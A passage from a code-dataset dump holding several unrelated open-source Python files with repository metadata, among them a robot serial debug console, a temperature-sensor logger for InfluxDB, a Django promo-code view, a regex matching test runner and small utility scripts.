has_tried_move:\n has_tried_move = True\n if move_to:\n drawing.move_to(g.functions[0].subs(g.limits[0], x_pos),\n g.functions[1].subs(g.limits[0], x_pos))\n continue\n drawing.line_to(g.functions[0].subs(g.limits[0], x_pos),\n g.functions[1].subs(g.limits[0], x_pos))\n\n","repo_name":"zshipko/libtwombly","sub_path":"py/twombly/sym.py","file_name":"sym.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"41631656765","text":"import serial\nimport serial.tools.list_ports\nimport copy\n\nimport numpy as np\nimport math\nimport random\n\n\nclass AsciiSerial:\n def __init__(self):\n self._graphsChannels = {'graph1': None, 'graph2': None, 'graph3': None, 'graph4': None}\n self._enChannels = {'graph1': False, 'graph2': False, 'graph3': False, 'graph4': False}\n\n # Structure definition:\n # {'ChannelName': channelData('display', {'lineName': [lowLevelID, xFieldID, yFieldID(optional)], ... }), ... }\n self._channelsDataStructure = {\n 'POSITION': channelData('line-scatter', {'p': [0, 0, 1]}),\n 'TRAJECTORY': channelData('line-scatter', {'t': [1, 0, 1]}),\n 'PID_V_G': channelData('line', {'setPoint': [2, 0], 'value': [2, 1], 'output': [2, 2]}),\n 'PID_V_D': channelData('line', {'setPoint': [3, 0], 'value': [3, 1], 'output': [3, 2]}),\n 'PID_TRANS': channelData('line', {'setPoint': [4, 0], 'value': [4, 1], 'output': [4, 2]}),\n 'BLOCKING_M_G': channelData('line', {'aimSpeed': [5, 0], 'realSpeed': [5, 1], 'isBlocked': [5, 2]}),\n 'BLOCKING_M_D': channelData('line', {'aimSpeed': [6, 0], 'realSpeed': [6, 1], 'isBlocked': [6, 2]}),\n 'STOPPING_MGR': channelData('line', {'speed': [7, 0], 'isStopped': [7, 1]}),\n 'DIRECTION': channelData('line', {'aimDirection': [8, 0], 'realDirection': [8, 1]}),\n 'SENSORS': channelData('scatter', {'sensorTest': [9, 0, 1]}),\n 'PID_TRAJ': channelData('scatter', {'p': [0, 0, 1], 't': [1, 0, 1]}),\n 'TRAJ_ERRORS': channelData('line', {'t': [10, 0], 'c': [10, 1], 'ac': [10, 2], 'ang': [10, 3], 'pos': [10, 4]}),\n 'AX12_G': channelData('line', {'aim': [8, 4], 'real': [8, 2]}),\n 'AX12_D': channelData('line', {'aim': [8, 5], 'real': [8, 3]})\n }\n\n self._shapeInitData = {\n 'line': [],\n 'line-scatter': [[], []],\n 'scatter': [[], []]\n }\n\n self.linesToSend = []\n self.receivedLines_main = []\n self.receivedLines_warning = []\n self.receivedLines_error = []\n\n self.serial = serial.Serial()\n self.incomingLine = \"\"\n\n # Format des données :\n # {'graphN': {'data': {'lineName': lineData, ...}, 'shape': String}\n #\n # 'shape' peut être :\n # \"line\" : ligne continue reliant chaque point\n # \"scatter\": nuage de points (x,y) indépendants\n # \"line-scatter: nuage de points (x,y) reliés entre eux\n #\n # Pour chaque 'shape', 'lineData' a une forme différente :\n # \"line\" : tableau à 1 dimension représentant les coordonnées y de chaque point\n # \"scatter\": tableau t à 2 dimensions. t[0] est un tableau représentant x pour chaque point. t[1] représente y\n # \"line-scatter\": idem que 'scatter'\n\n self.graphData = {'graph1': {'data': None, 'shape': None},\n 'graph2': {'data': None, 'shape': None},\n 'graph3': {'data': None, 'shape': None},\n 'graph4': {'data': None, 'shape': None}}\n\n self.phase = np.linspace(0, 10 * np.pi, 100)\n self.index = 0\n\n @staticmethod\n def scanPorts():\n return list(serial.tools.list_ports.comports())\n\n def open(self, port):\n self.serial.port = port.split(\" \")[0]\n self.serial.open()\n\n def close(self):\n self.serial.close()\n\n def getChannelsList(self):\n channelsList = []\n for key in self._channelsDataStructure:\n channelsList.append(key)\n channelsList.sort()\n return channelsList\n\n def getChannelsFromID(self, identifier):\n channels = set()\n for channel, cData in self._channelsDataStructure.items():\n lines = cData.lineNames\n for lineName, lineIds in lines.items():\n if lineIds[0] == identifier:\n channels.add(channel)\n return channels\n\n def getIDsFromChannel(self, channel):\n ids = set()\n lines = self._channelsDataStructure[channel].lineNames\n for lineName, lineIds in lines.items():\n ids.add(lineIds[0])\n return ids\n\n def communicate(self):\n if self.serial.is_open:\n for line in self.linesToSend:\n self.serial.write(line.encode('ascii'))\n self.linesToSend.clear()\n\n nbB = self.serial.in_waiting\n if nbB > 0:\n self.incomingLine += self.serial.read(nbB).decode(encoding='utf-8', errors='ignore')\n\n newLineIndex = self.incomingLine.find('\\n')\n while newLineIndex != -1:\n self.addLineToProperList(self.incomingLine[0:newLineIndex+1])\n self.incomingLine = self.incomingLine[newLineIndex+1:]\n newLineIndex = self.incomingLine.find('\\n')\n\n def addLineToProperList(self, line):\n if len(line) > 5 and line[0:6] == \"_data_\":\n try:\n self.addGraphData(line[6:])\n except ValueError:\n self.receivedLines_main.append(line)\n elif len(line) > 8 and line[0:9] == \"_warning_\":\n self.receivedLines_warning.append(line[9:])\n elif len(line) > 7 and line[0:7] == \"_error_\":\n splittedLine = line.split(\"_\")\n errorLine = \"#\" + splittedLine[2] + \"# \"\n for s in splittedLine[3:]:\n errorLine += s\n self.receivedLines_error.append(errorLine)\n else:\n self.receivedLines_main.append(line)\n\n def addGraphData(self, strData):\n data = strData.split(\"_\")\n idChannel = int(data[0])\n channels = self.getChannelsFromID(idChannel)\n\n values = []\n for strValue in data[1:]:\n values.append(float(strValue))\n\n for graph in ['graph1', 'graph2', 'graph3', 'graph4']:\n gChannel = self._graphsChannels[graph]\n if gChannel in channels and self._enChannels[graph]:\n lines = self._channelsDataStructure[gChannel].lineNames\n for lineName, ids in lines.items():\n if ids[0] == idChannel:\n if len(ids) == 2: # One dimension data\n if len(values) <= 1:\n raise ValueError\n self.graphData[graph]['data'][lineName].append(values[ids[1]])\n elif len(ids) == 3: # Two dimensions data\n if len(values) <= 2:\n raise ValueError\n self.graphData[graph]['data'][lineName][0].append(values[ids[1]])\n self.graphData[graph]['data'][lineName][1].append(values[ids[2]])\n\n\n def setEnabledChannels(self, competeConfig):\n newGraphsChannels = {'graph1': competeConfig['graph1']['channel'],\n 'graph2': competeConfig['graph2']['channel'],\n 'graph3': competeConfig['graph3']['channel'],\n 'graph4': competeConfig['graph4']['channel']}\n newEnabledList = {'graph1': competeConfig['graph1']['enable'],\n 'graph2': competeConfig['graph2']['enable'],\n 'graph3': competeConfig['graph3']['enable'],\n 'graph4': competeConfig['graph4']['enable']}\n\n commandLines = []\n graphs = ['graph1', 'graph2', 'graph3', 'graph4']\n for graph in graphs:\n if newGraphsChannels[graph] != self._graphsChannels[graph]:\n if self._enChannels[graph]:\n commandLines += self.enableChannel(self._graphsChannels[graph], False)\n else:\n if newEnabledList[graph] != self._enChannels[graph]:\n if not newEnabledList[graph]:\n commandLines += self.enableChannel(self._graphsChannels[graph], False)\n\n for graph in graphs:\n if newGraphsChannels[graph] != self._graphsChannels[graph]:\n if newEnabledList[graph]:\n self.resetGraphData(graph, newGraphsChannels[graph])\n commandLines += self.enableChannel(newGraphsChannels[graph], True)\n else:\n if newEnabledList[graph] != self._enChannels[graph]:\n if newEnabledList[graph]:\n self.resetGraphData(graph, newGraphsChannels[graph])\n commandLines += self.enableChannel(self._graphsChannels[graph], True)\n\n self._graphsChannels = newGraphsChannels\n self._enChannels = newEnabledList\n return commandLines\n\n def enableChannel(self, channel, enable):\n commandLines = []\n ids = self.getIDsFromChannel(channel)\n for i in ids:\n if enable:\n commandLine = \"logon \"\n else:\n commandLine = \"logoff \"\n commandLine += str(i)\n commandLine += '\\n'\n self.addLinesToSend([commandLine])\n commandLines.append(commandLine)\n return commandLines\n\n def resetGraphData(self, graph, channel):\n cData = self._channelsDataStructure[channel]\n self.graphData[graph]['shape'] = cData.shape\n initData = self._shapeInitData[cData.shape]\n initDict = {}\n for name in cData.lineNames:\n initDict[name] = copy.deepcopy(initData)\n self.graphData[graph]['data'] = copy.deepcopy(initDict)\n\n def getLines_main(self):\n lines = copy.deepcopy(self.receivedLines_main)\n self.receivedLines_main.clear()\n return lines\n\n def getLines_warning(self):\n lines = copy.deepcopy(self.receivedLines_warning)\n self.receivedLines_warning.clear()\n return lines\n\n def getLines_error(self):\n lines = copy.deepcopy(self.receivedLines_error)\n self.receivedLines_error.clear()\n return lines\n\n def addLinesToSend(self, lines):\n self.linesToSend += lines\n\n def clearLinesToSend(self):\n self.linesToSend = []\n\n def getAllData(self):\n # y = np.multiply(np.sin(np.linspace(0, 6 * np.pi, 100) + self.phase[self.index]), self.index/20)\n # y2 = np.multiply(np.sin(np.linspace(0, 6 * np.pi, 100) + (self.phase[self.index] + 0.1)), self.index/30)\n # self.index = int(math.fmod((self.index + 1), len(self.phase)))\n # return {'graph1': {'data': {'pwm': y, 'bite': y2}, 'shape': 'line'},\n # 'graph2': {'data':\n # {'traj': [[0,1,5*random.random(),9,12,6,3],[0,2,3,6*random.random(),7,2,-3]],\n # 'bite': [[0, 2, 4 * random.random(), 9, 12, 7, 3],\n # [3, 2, 3, 5 * random.random(), 3, 2, -1]]},\n # 'shape': 'scatter'},\n # 'graph3': {'data': {}, 'shape': 'line'},\n # 'graph4': {'data': {}, 'shape': 'line'}\n # }\n\n for graph in ['graph1', 'graph2', 'graph3', 'graph4']:\n if self.graphData[graph]['data'] is not None:\n for key, value in self.graphData[graph]['data'].items():\n if len(value) > 1000:\n value = value[len(value) - 1000:]\n #print(key, value)\n return self.graphData\n\n\nclass channelData:\n def __init__(self, shape, lineNames):\n self.shape = shape\n self.lineNames = lineNames","repo_name":"INTechSenpai/moon-rover","sub_path":"debug_tools/python_debug_console/AsciiSerial.py","file_name":"AsciiSerial.py","file_ext":"py","file_size_in_byte":11638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12926481157","text":"import argparse\nimport os\nimport shutil\nimport sys\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Copy a Dart package')\n\n parser.add_argument(\n '--source', type=str, help='Source directory assembled by dart_pkg.py'\n )\n parser.add_argument(\n '--dest', type=str, help='Destination directory for the package'\n )\n\n args = parser.parse_args()\n\n if os.path.exists(args.dest):\n shutil.rmtree(args.dest)\n\n # dart_pkg.py will create a packages directory within the package.\n # Do not copy this into the release output.\n shutil.copytree(\n args.source, args.dest, ignore=shutil.ignore_patterns('packages')\n )\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"flutter/engine","sub_path":"sky/tools/dist_dart_pkg.py","file_name":"dist_dart_pkg.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":6866,"dataset":"github-code","pt":"37"} +{"seq_id":"28646563680","text":"import time\nimport configparser\nimport Adafruit_DHT\nfrom influxdb import InfluxDBClient\n\n# Configuration File\nCONFIG_FILE = \"settings.conf\"\n\ndef get_reading(config):\n # InfluxDB connection info\n host = config['influxdb_settings']['host']\n port = config['influxdb_settings']['port']\n user = config['influxdb_settings']['user']\n password = config['influxdb_settings']['password']\n dbname = config['influxdb_settings']['dbname']\n\n # Create the InfluxDB client object\n client = InfluxDBClient(host, port, user, password, dbname)\n\n # Sensor details\n #sensor = str(config['sensor_settings']['sensor'])\n sensor = Adafruit_DHT.DHT22\n sensor_gpio = config['sensor_settings']['sensor_gpio_pin']\n measurement = config['sensor_settings']['measurement']\n location = config['sensor_settings']['location']\n\n humidity, celcius = Adafruit_DHT.read_retry(sensor, sensor_gpio)\n if humidity is None:\n print (\"Humidity is null, possibly an err code.\")\n return\n if humidity > 100 or humidity < 0 :\n print (\"Humidity is abnormal, possibly an err code : \" + str(humidity))\n return\n \n # Add Farhenheit for us 'Mericans\n farhenheit = celcius * 9 / 5 + 32\n\n # Structure Timestamp to UTC\n current_time = time.gmtime()\n timestamp = time.strftime('%Y-%m-%dT%H:%M:%SZ', current_time)\n\n #Dew Point\n dew_point = celcius - ((100 - humidity) / 5)\n\n #Heat Index\n heat_index = - 42.379 + (2.04901523 * farhenheit) + (10.14333127 * humidity) - (0.22475541 * farhenheit * humidity) - (6.83783*(10**-3)*farhenheit**2) - (5.481717 * (10**-2) * humidity**2) + (1.22874 * (10**-3) * farhenheit**2 * humidity) + (8.5282*(10**-4) * farhenheit * humidity**2) - (1.99*(10**-6) * farhenheit**2 * humidity**2)\n\n # Structure the data for write\n data = [\n {\n \"measurement\": measurement,\n \"tags\": {\n \"location\": location,\n },\n \"time\": timestamp,\n \"fields\": {\n \"temperature_c\": celcius,\n \"temperature_f\": farhenheit,\n \"humidity\": humidity,\n \"dew_point\": dew_point,\n \"heat_index_f\": heat_index,\n \"heat_index_c\": (heat_index - 32) * 5/9 \n }\n }\n ]\n\n # Write it!\n client.write_points(data)\n\n # Return the temperature value.\n return data\n\n\ndef read_config():\n cfg = configparser.ConfigParser()\n\n # Read the config\n cfg.read(CONFIG_FILE)\n\n # Read the Values from the config\n config = {section: {k: v for k, v in cfg.items(section)} for section in cfg.sections()}\n\n # Return the config\n return config\n\n\ndef main():\n # Initial threshold counter.\n threshold_counter = []\n\n # Read the config\n config = read_config()\n\n while True:\n\n try:\n\n # Get the reading and send to Influx\n current_temperature = get_reading(config)\n\n except Exception as e:\n print(e)\n\n # Loop Complete - Sleep for 10 seconds\n time.sleep(15)\n\nif __name__ == '__main__':\n main()\n","repo_name":"prafiles/iot-sensors","sub_path":"sensor-iot.py","file_name":"sensor-iot.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"72309686133","text":"from django.shortcuts import render, redirect\nfrom django.utils import timezone\nfrom django.views.decorators.http import require_POST\nfrom .models import PromoCode\nfrom .forms import PromoCodeApplyForm\n\n\n@require_POST\ndef promo_code_apply(request):\n now = timezone.now()\n form = PromoCodeApplyForm(request.POST)\n if form.is_valid():\n code = form.cleaned_data['code']\n try:\n promo_code = PromoCode.objects.get(code__iexact=code,\n valid_from__lte=now,\n valid_to__gte=now,\n active=True)\n request.session['promo_code_id'] = promo_code.id\n except PromoCode.DoesNotExist:\n request.session['promo_code_id'] = None\n return redirect('cart:cart_detail')\n","repo_name":"arturkuchynski/ecom","sub_path":"ecom/promos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"482","text":"def error_check(content):\n try:\n num_check = content[1:]\n\n except IndexError:\n return True\n\n for number in num_check:\n\n try:\n _ = int(number)\n\n except ValueError:\n return True\n\n return False\n\n\ndef cal_ratio(inhabitant, cases):\n per_100ths = 100000\n\n ratio_per_100ths = cases / inhabitant * per_100ths\n\n return ratio_per_100ths\n\n\ndef travel_rest_def(ratio_per_100ths):\n travel_rest = 1\n\n if ratio_per_100ths >= 8:\n travel_rest = 2\n\n else:\n pass\n\n return travel_rest\n\n\ndef main():\n filename = input(\"Enter the name of the file to be read:\\n \")\n # filename = \"statistics2.txt\"\n amount = []\n\n\n try:\n open_file = open(filename, 'r')\n\n for line in open_file:\n line = line.strip()\n\n try:\n content = line.split(\",\")\n\n except line == \"\":\n print(f\"Incorrect line: {line}\")\n continue\n\n error = error_check(content)\n\n if error:\n print(f\"Incorrect number in line: {line}\")\n continue\n\n try:\n country = content[0]\n inhabitant = int(content[1])\n cases = int(content[2])\n\n except IndexError:\n print(f\"Incorrect line: {line}\")\n continue\n\n ratio_per_100ths = cal_ratio(inhabitant, cases)\n\n travel_rest = travel_rest_def(ratio_per_100ths)\n\n amount.append(travel_rest)\n\n if travel_rest == 2:\n print(f\"{country:s} ({ratio_per_100ths:.1f} cases per 100000 inhabitants): travel restrictions apply.\")\n\n else:\n print(f\"{country:s} ({ratio_per_100ths:.1f} cases per 100000 inhabitants): no travel restrictions.\")\n\n if amount.count(2) > 0:\n print(f\"Travel restrictions apply to {amount.count(2):d} countries.\")\n\n else:\n print(\"There were no countries in the file.\")\n\n except FileNotFoundError:\n print(f\"Error in reading the file {filename}. Program ends.\")\n\n except OSError:\n print(\"There were no countries in the file.\")\n\n\nmain()\n","repo_name":"KazuichiroTaira/CS_A1111","sub_path":"PracticeExam/Task3/travelrestriction.py","file_name":"travelrestriction.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13047624725","text":"from cavachon.config.config_mapping.ConfigMapping import ConfigMapping\r\nfrom cavachon.config.config_mapping.FilterConfig import FilterConfig\r\nfrom cavachon.environment.Constants import Constants\r\nfrom cavachon.utils.GeneralUtils import GeneralUtils\r\nfrom copy import deepcopy\r\nfrom typing import Any, List, Mapping\r\n\r\nclass ModalityConfig(ConfigMapping):\r\n \"\"\"ModalityConfig\r\n\r\n Config for modality.\r\n\r\n Attributes\r\n ----------\r\n name: str\r\n name of the modality.\r\n \r\n samples: List[str]\r\n names of the samples.\r\n\r\n type: str\r\n modality type.\r\n\r\n dist: str\r\n distribution name of the modality.\r\n\r\n h5ad: str\r\n filename to the h5ad (if not provided with samples)\r\n\r\n filters: List[FilterConfig]\r\n filter step configs for the modality.\r\n\r\n \"\"\"\r\n def __init__(self, **kwargs: Mapping[str, Any]):\r\n \"\"\"Constructor for ModalityConfig. \r\n\r\n Parameters\r\n ----------\r\n name: str\r\n name of the modality.\r\n\r\n type: str\r\n modality type.\r\n\r\n dist: str, optional\r\n the data distribution of the modality. Currently supports \r\n `'IndependentBernoulli'` and \r\n `'IndependentZeroInflatedNegativeBinomial'` \r\n (see `cavachon/distributions` for more details). Defaults to:\r\n 1. `'IndependentBernoulli'` for `type:atac`.\r\n 2. `'IndependentZeroInflatedNegativeBinomial'` for `type:rna`.\r\n\r\n samples: List[str]\r\n names of the samples.\r\n\r\n h5ad: str, optional\r\n filename to the h5ad (if not provided with samples)\r\n\r\n filters: List[FilterConfig]\r\n filter step configs for the modality.\r\n \r\n batch_effect_colnames: List[str]\r\n the column names of the batch effects that needs to be corrected.\r\n\r\n \"\"\"\r\n # change default values here\r\n self.name: str\r\n self.type: str\r\n self.dist: str\r\n self.samples: List[str] = list()\r\n self.h5ad: str = ''\r\n self.filters: List[FilterConfig] = list()\r\n self.batch_effect_colnames: List[str] = list()\r\n\r\n # preprocess\r\n kwargs = deepcopy(kwargs)\r\n ## name\r\n name = kwargs.get('name')\r\n kwargs['name'] = GeneralUtils.tensorflow_compatible_str(name)\r\n \r\n ## modality type\r\n modality_type = kwargs.get(Constants.CONFIG_FIELD_MODALITY_TYPE).lower()\r\n kwargs[Constants.CONFIG_FIELD_MODALITY_TYPE] = modality_type\r\n \r\n ## filters\r\n if Constants.CONFIG_FIELD_MODALITY_FILTER in kwargs:\r\n filter_configs = kwargs.get(Constants.CONFIG_FIELD_MODALITY_FILTER)\r\n filter_configs = [FilterConfig(**x) for x in filter_configs]\r\n kwargs[Constants.CONFIG_FIELD_MODALITY_FILTER] = filter_configs\r\n\r\n ## dist\r\n if Constants.CONFIG_FIELD_MODALITY_DIST not in kwargs:\r\n self.dist = Constants.DEFAULT_MODALITY_DISTRIBUTION.get(modality_type)\r\n\r\n super().__init__(\r\n kwargs, \r\n [\r\n 'name',\r\n 'type',\r\n 'dist',\r\n 'samples', \r\n 'h5ad',\r\n 'filters',\r\n 'batch_effect_colnames'\r\n ])\r\n ","repo_name":"dn070017/CAVACHON","sub_path":"cavachon/config/config_mapping/ModalityConfig.py","file_name":"ModalityConfig.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75095252853","text":"from sklearn.model_selection import train_test_split\n\ndef split_strat_train_val_test(\n df_input, stratify_colname='y', random_state=123,\n frac_train=0.8, frac_val=0.10, frac_test=0.10):\n if frac_train + frac_val + frac_test != 1.0:\n raise ValueError('fractions %f, %f, %f do not add up to 1.0' % \\\n (frac_train, frac_val, frac_test))\n if stratify_colname not in df_input.columns:\n raise ValueError('%s is not a column in the dataframe' % stratify_colname)\n X = df_input\n y = df_input[[stratify_colname]]\n df_train, df_temp, y_train, y_temp = train_test_split(\n X, y, stratify=y, test_size=(1.0 - frac_train), random_state=random_state)\n relative_frac_test = frac_test / (frac_val + frac_test)\n df_val, df_test, y_val, y_test = train_test_split(\n df_temp, y_temp, stratify=y_temp, test_size=relative_frac_test, random_state=random_state)\n assert len(df_input) == len(df_train) + len(df_val) + len(df_test)\n return df_train, df_val, df_test","repo_name":"leletheprogrammer/SA_Progetto","sub_path":"splitting.py","file_name":"splitting.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71356829494","text":"#!/usr/bin/env python\n\nimport os\nimport sys\n\nfrom setuptools import setup\nfrom cssbeautifier.__version__ import __version__\n\nfrom setuptools.command.test import test as TestCommand\n\nDIR_CSS = \"cssbeautifier/tests/\"\n\n\nclass PyTestCSS(TestCommand):\n user_options = [(\"pytest-args=\", \"a\", \"Arguments to pass to py.test\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = [\"--assert=plain\"] + [\n DIR + x for x in os.listdir(DIR) if x.endswith(\".py\") and x[0] not in \"._\"\n ]\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name=\"cssbeautifier\",\n version=__version__,\n description=\"CSS unobfuscator and beautifier.\",\n long_description=(\"Beautify, unpack or deobfuscate CSS\"),\n author=\"Liam Newman, Einar Lielmanis, et al.\",\n author_email=\"team@beautifier.io\",\n url=\"https://beautifier.io\",\n entry_points={\"console_scripts\": [\"css-beautify = cssbeautifier:main\"]},\n packages=[\n \"cssbeautifier\",\n \"cssbeautifier.tests\",\n \"cssbeautifier.tests.generated\",\n \"cssbeautifier.css\",\n ],\n install_requires=[\"jsbeautifier\", \"six>=1.13.0\", \"editorconfig>=0.12.2\"],\n license=\"MIT\",\n test_suite=\"pytest.collector\",\n cmdclass={\"test\": PyTestCSS},\n)\n","repo_name":"beautify-web/js-beautify","sub_path":"python/setup-css.py","file_name":"setup-css.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":8320,"dataset":"github-code","pt":"21"} +{"seq_id":"33874559855","text":"# G00362383 - Michael Mulholland\n\n# Ian, here's at great website that you might be interested in.\n# Convert simple regular expressions to nondeterministic finite automaton.\n# https://cyberzhg.github.io/toolbox/regex2nfa?regex=YSti\n\n# import the match method from the regex.py file\nfrom regex import match\n\n# import unittest - it is a unit testing framework\nimport unittest\n\n# import the test_program.py file\nimport test_program\n\n# imported for the command-line interface\nimport argparse\n\ndef main():\n\n # writing to a file\n f = open(\"regExpResults.txt\", \"a\")\n \n # command line argument -h \n # program description\n parser = argparse.ArgumentParser(\n description = \"A program using the Python programming language that\\\n can build a non-deterministic finite automation (NFA) from\\\n a regular expression. This program will use the NFA to check\\\n if the regular expression matches any given string of text.\"\n )\n\n # command line argument group.\n # allows for us to specify options that conflict with each other.\n group = parser.add_mutually_exclusive_group()\n \n # command line argument -V or --version. Displays the python version\n group.add_argument(\"-V\", \"--version\", help=\"show program version\", \n action=\"store_true\")\n \n # command line argument -r or --run. \n # Brief description on how to run the program\n group.add_argument(\"-r\", \"--run\", help=\"how to run the program\", \n action=\"store_true\")\n \n # command line argument -v or --verbose. \n # Displays results of pre-written tests in more detail\n group.add_argument(\"-v\", \"--verbose\", help=\"Displays results of\\\n pre-written tests in more detail\", action=\"store_true\")\n \n # command line argument -q or --quite. \n # Displays results of pre-written tests in less detail\n group.add_argument(\"-q\", \"--quite\", help=\"Displays results of\\\n pre-written tests in less detail\", action=\"store_true\")\n\n # parse the args\n args = parser.parse_args()\n\n print()\n # displays python version\n if args.version:\n print(\"Python Version: 3.8.2\")\n print()\n exit()\n # Brief description on how to run the program\n elif args.run:\n print(\"How to run the program: Select one of the following options:\")\n print(\"\\tOption 1: enter your own regular expression and String. \" +\n \"If the regular expression regex matches the string, \" +\n \"TRUE will be returned. If it does not match, FALSE will be returned.\")\n print(\"\\tOption 2: runs a number pre-written tests.\")\n print(\"\\tOption 3: is to quit the program.\")\n print()\n exit()\n\n while True:\n # user to select one of three options\n print()\n print(\"Select one of the following options:\")\n print(\"Enter 1: to test your own regular expression and String.\")\n print(\"Enter 2: to test pre-written tests.\")\n print(\"Enter 3: to quit the program.\")\n choice = input(\"Please select one of the above: \") \n \n #If yes then ask for the following input and match it\n if choice == '1':\n print()\n # input from console - \n # https://pynative.com/python-input-function-get-user-input/\n # get the regular expresson from user input\n regex = input(\"Enter the regular expression: \")\n\n # get the String from user input\n s = input(\"Enter string: \")\n print()\n\n if args.verbose:\n # The match() function will return TRUE \n # if the regular expression regex matches the string.\n # It returns FALSE otherwise\n print(\"The regular expression is: \" + regex, \n \" the String is: \" + s, \" Match: \", match(regex, s))\n elif args.quite:\n print(regex, \" \" + s, \" \", match(regex, s))\n else: \n print(\"Regex: \" + regex, \" String: \" + s, \n \" Match: \", match(regex, s))\n\n strRegex = \"Regex: \"\n inputRegex = regex\n strString = \" String: \"\n inputString = s\n strMatch = \" Match: \"\n boolResult = match(regex, s)\n newLine = \"\\n\"\n\n # concat all the variable to allow writing to file\n strConcat = strRegex + inputRegex + strString + inputString\\\n + strMatch + str(boolResult) + newLine\n\n # write the users input to a file\n f.write(strConcat)\n \n elif choice == '2':\n # Print out of the tests and expected result\n # just so the user can see something\n \n # Array of regular expressions\n regex = [\"b.c\", \"a.b|b*\", \"a|c.b*\", \"c*.b\", \"a+b\", \"a+b.c\", \"b?\"]\n # Array of strings \n stringsArr = [\"bcccc\", \"bbb\", \"abc\", \"bc\", \"ccccccb\", \n \"abccd\", \"a\", \"\"]\n \n if args.verbose:\n # Nested for loop to compare each index of the regex array with \n # every index of the strings array to see if they match\n for reg in regex:\n print()\n for s in stringsArr:\n print(\"The regular expression is: \" + reg, \n \" the String is: \" + s, \" Match: \", match(reg, s))\n\n elif args.quite:\n # Nested for loop to compare each index of the regex array with \n # every index of the strings array to see if they match\n for reg in regex:\n print()\n for s in stringsArr:\n print(\"Regex: \" + reg, \" String: \" + s, \n \" Match: \", match(reg, s))\n\n else: \n print()\n # The above tests will allow the user to see the tests and\n # expected result. The below test will only return OK if all \n # tests pass or FAILED if one test fails\n # The below runs unittest from the test_progam.py\n # https://stackoverflow.com/questions/31559473/run-unittests-from-a-different-file\n print(\"unittest from the test_program.py file\")\n print()\n suite = unittest.TestLoader().loadTestsFromModule(test_program)\n unittest.TextTestRunner(verbosity=2).run(suite) \n\n else:\n print()\n # quiting the program\n print(\"The program has now finished.\")\n exit()\n\n f.close()\nmain()\n","repo_name":"Michael-Mulholland/Graph-Theory-Project","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74147100532","text":"import os\nimport subprocess\nimport time\n\n\ndef get_map_mrr(qids, predictions, labels, device=0, keep_results=False):\n \"\"\"\n Get the map and mrr using the trec_eval utility.\n qids, predictions, labels should have the same length.\n device is not a required parameter, it is only used to prevent potential naming conflicts when you\n are calling this concurrently from different threads of execution.\n :param qids: query ids of predictions and labels\n :param predictions: iterable of predictions made by the models\n :param labels: iterable of labels of the dataset\n :param device: device (GPU index or -1 for CPU) for identification purposes only\n \"\"\"\n qrel_fname = 'trecqa_{}_{}.qrel'.format(time.time(), device)\n results_fname = 'trecqa_{}_{}.results'.format(time.time(), device)\n qrel_template = '{qid} 0 {docno} {rel}\\n'\n results_template = '{qid} 0 {docno} 0 {sim} castor-model\\n'\n with open(qrel_fname, 'w') as f1, open(results_fname, 'w') as f2:\n docnos = range(len(qids))\n for qid, docno, predicted, actual in zip(qids, docnos, predictions, labels):\n f1.write(qrel_template.format(qid=qid, docno=docno, rel=actual))\n f2.write(results_template.format(qid=qid, docno=docno, sim=predicted))\n\n trec_eval_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'trec_eval-9.0.5/trec_eval')\n trec_out = subprocess.check_output([trec_eval_path, '-m', 'map', '-m', 'recip_rank', qrel_fname, results_fname])\n trec_out_lines = str(trec_out, 'utf-8').split('\\n')\n mean_average_precision = float(trec_out_lines[0].split('\\t')[-1])\n mean_reciprocal_rank = float(trec_out_lines[1].split('\\t')[-1])\n\n if keep_results:\n print(\"Saving prediction file to {}\".format(results_fname))\n print(\"Saving qrel file to {}\".format(qrel_fname))\n else:\n os.remove(results_fname)\n os.remove(qrel_fname)\n\n return mean_average_precision, mean_reciprocal_rank\n","repo_name":"castorini/castor","sub_path":"utils/relevancy_metrics.py","file_name":"relevancy_metrics.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"21"} +{"seq_id":"39172955921","text":"import datetime\nfrom io import BytesIO\n\nimport networkx as nx\nimport cv2 as cv\nimport numpy as np\n\nimport fpdf\nimport xlsxwriter\nfrom PIL import Image\n\n\nclass TextDrawer:\n def __init__(self, font_face, font_scale, font_thickness):\n self.font_face = font_face\n self.font_scale = font_scale\n self.font_thickness = font_thickness\n\n def draw_texts(self, image, texts, center_coords):\n assert len(texts) == len(center_coords)\n rectangle_size = self._get_max_text_size(texts)\n for text, center_coord in zip(texts, center_coords):\n self._draw_text(image, text, center_coord, rectangle_size)\n\n def _get_max_text_size(self, texts):\n return max(max(cv.getTextSize(text, self.font_face, self.font_scale, self.font_thickness)[0]) for text in texts)\n\n def _draw_text(self, image, text, center_coord, rectangle_size, fill_color=(255, 255, 255), text_color=(0, 0, 0),\n line_color=(255, 0, 0), line_thickness=0):\n coord1 = center_coord - rectangle_size / 2\n 